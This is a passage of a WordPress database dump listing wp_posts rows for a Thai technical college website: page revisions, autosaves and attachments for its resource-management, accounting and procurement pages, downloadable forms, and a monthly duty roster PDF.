width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-06 15:36:57', '2018-03-06 08:36:57', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1541, 3, '2018-03-06 15:40:51', '2018-03-06 08:40:51', '<a href=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\"><img class=\"aligncenter size-full wp-image-4820\" src=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\" alt=\"\" width=\"202\" height=\"249\" /></a><a href=\"/wp-content/uploads/2018/12/Picture2.png\"><img class=\"aligncenter wp-image-4821\" src=\"/wp-content/uploads/2018/12/Picture2.png\" alt=\"\" width=\"354\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n ', 'งานการบัญชี', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%b1%e0%b8%8d%e0%b8%8a%e0%b8%b5', '', '', '2018-12-24 15:44:03', '2018-12-24 08:44:03', '', 0, 'http://www.technicrayong.ac.th/?page_id=1541', 0, 'page', '', 0),
(1542, 3, '2018-03-06 15:40:51', '2018-03-06 08:40:51', '<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"383\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n ', 'งานการบัญชี', '', 'inherit', 'closed', 'closed', '', '1541-revision-v1', '', '', '2018-03-06 15:40:51', '2018-03-06 08:40:51', '', 1541, 'http://www.technicrayong.ac.th/1541-revision-v1/', 0, 'revision', '', 0),
(1543, 3, '2018-03-06 15:42:55', '2018-03-06 08:42:55', '<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"383\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n ', 'งานการบัญชี', '', 'inherit', 'closed', 'closed', '', '1541-autosave-v1', '', '', '2018-03-06 15:42:55', '2018-03-06 08:42:55', '', 1541, 'http://www.technicrayong.ac.th/1541-autosave-v1/', 0, 'revision', '', 0),
(1544, 3, '2018-03-06 15:43:32', '2018-03-06 08:43:32', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-06 15:43:32', '2018-03-06 08:43:32', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1545, 3, '2018-03-06 15:45:21', '2018-03-06 08:45:21', '<img class=\"aligncenter size-full wp-image-4609\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"377\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4611\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\" alt=\"\" width=\"162\" height=\"204\" />\r\n\r\n<img class=\"aligncenter wp-image-4612\" src=\"/wp-content/uploads/2018/11/Picture1-300x80.png\" alt=\"\" width=\"386\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-4617 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\" alt=\"\" width=\"1109\" height=\"345\" />\r\n<h4><span style=\"color: #0000ff;\">** <a href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-.doc\">แบบฟอร์ม สผ.งาน</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc\">แบบฟอร์มคุณลักษณะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ขั้นตอนการจัดทำSPEC.pdf\">ขั้นตอนการจัดทำSPEC</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc\">ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc\">ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์ </a></span>\r\n\r\n ', 'งานพัสดุ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%aa%e0%b8%94%e0%b8%b8', '', '', '2018-11-16 15:28:41', '2018-11-16 08:28:41', '', 0, 'http://www.technicrayong.ac.th/?page_id=1545', 0, 'page', '', 0),
(1546, 3, '2018-03-06 15:45:21', '2018-03-06 08:45:21', '<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"383\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-03-06 15:45:21', '2018-03-06 08:45:21', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(1548, 3, '2018-03-06 15:55:38', '2018-03-06 08:55:38', '<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"383\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n<h4><span style=\"color: #0000ff;\">**แบบฟอร์ม สผ. (งาน) <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #ff00ff;\">**แบบฟอร์ม สผ. (แผนก)</span> <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - แบบฟอร์มคุณลักษณะครุภัณฑ์ </span>\r\n\r\n<span style=\"color: #ff0000;\"> - ขั้นตอนการจัดทำ SPEC</span>\r\n\r\n<span style=\"color: #ff0000;\"> - ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</span>\r\n\r\n<span style=\"color: #ff0000;\"> - ตัวอย่างรายงานผลการจัดทำคุณลักษณะครุภัณฑ์</span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-03-06 15:55:38', '2018-03-06 08:55:38', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(1549, 3, '2018-03-06 16:04:52', '2018-03-06 09:04:52', '<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"383\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n<h4><span style=\"color: #0000ff;\">**แบบฟอร์ม สผ. (งาน) <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #ff00ff;\">**แบบฟอร์ม สผ. (แผนก)</span> <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - แบบฟอร์มคุณลักษณะครุภัณฑ์ </span>\r\n\r\n<span style=\"color: #ff0000;\"> - ขั้นตอนการจัดทำ SPEC</span>\r\n\r\n<span style=\"color: #ff0000;\"> - ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</span>\r\n\r\n<span style=\"color: #ff0000;\"> - ตัวอย่างรายงานผลการจัดทำคุณลักษณะครุภัณฑ์</span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-03-06 16:04:52', '2018-03-06 09:04:52', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(1550, 3, '2018-03-06 16:06:13', '2018-03-06 09:06:13', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-06 16:06:13', '2018-03-06 09:06:13', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1551, 3, '2018-03-06 16:18:24', '2018-03-06 09:18:24', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99-%E0%B8%A1%E0%B8%B5%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%A1-2561-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนมีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '1374-autosave-v1', '', '', '2018-03-06 16:18:24', '2018-03-06 09:18:24', '', 1374, 'http://www.technicrayong.ac.th/1374-autosave-v1/', 0, 'revision', '', 0),
(1554, 3, '2018-03-06 16:17:44', '2018-03-06 09:17:44', '', 'เวร เดือน มีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99-%e0%b8%a1%e0%b8%b5%e0%b8%99%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-03-06 16:17:44', '2018-03-06 09:17:44', '', 1374, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/เวร-เดือน-มีนาคม-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(1555, 3, '2018-03-06 16:18:04', '2018-03-06 09:18:04', '', 'เวร เดือน มีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99-%e0%b8%a1%e0%b8%b5%e0%b8%99%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-2', '', '', '2018-03-06 16:18:04', '2018-03-06 09:18:04', '', 1374, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/เวร-เดือน-มีนาคม-2561-1.pdf', 0, 'attachment', 'application/pdf', 0),
(1556, 3, '2018-03-06 16:18:15', '2018-03-06 09:18:15', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99-%E0%B8%A1%E0%B8%B5%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%A1-2561-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนมีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '1374-revision-v1', '', '', '2018-03-06 16:18:15', '2018-03-06 09:18:15', '', 1374, 'http://www.technicrayong.ac.th/1374-revision-v1/', 0, 'revision', '', 0),
(1563, 3, '2018-03-07 09:36:51', '2018-03-07 02:36:51', '', 'ขั้นตอนการจัดทำSPEC', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b8%b1%e0%b9%89%e0%b8%99%e0%b8%95%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%97%e0%b8%b3spec', '', '', '2018-03-07 09:36:51', '2018-03-07 02:36:51', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ขั้นตอนการจัดทำSPEC.pdf', 0, 'attachment', 'application/pdf', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1566, 3, '2018-03-07 09:38:08', '2018-03-07 02:38:08', '<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"383\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n<h4><span style=\"color: #0000ff;\">**แบบฟอร์ม สผ. (งาน) <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #ff00ff;\">**แบบฟอร์ม สผ. (แผนก)</span> <span style=\"color: #ff0000;\">คลิก</span></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> <a style=\"color: #ff0000;\" href=\"http://www.technicrayong.ac.th/แบบฟอร์มคุณลักษณะครุภั\">- แบบฟอร์มคุณลักษณะครุภัณฑ์</a> </span>\r\n\r\n<span style=\"color: #ff0000;\"> <a style=\"color: #ff0000;\" href=\"http://www.technicrayong.ac.th/ขั้นตอนการจัดทำspec\">- ขั้นตอนการจัดทำ SPEC</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</span>\r\n\r\n<span style=\"color: #ff0000;\"> - ตัวอย่างรายงานผลการจัดทำคุณลักษณะครุภัณฑ์</span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-03-07 09:38:08', '2018-03-07 02:38:08', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(1567, 3, '2018-03-07 09:40:14', '2018-03-07 02:40:14', '', 'แบบฟอร์มคุณลักษณะครุภัณฑ์', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%93%e0%b8%b0%e0%b8%84%e0%b8%a3%e0%b8%b8%e0%b8%a0%e0%b8%b1-2', '', '', '2018-03-07 09:40:14', '2018-03-07 02:40:14', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc', 0, 'attachment', 'application/msword', 0),
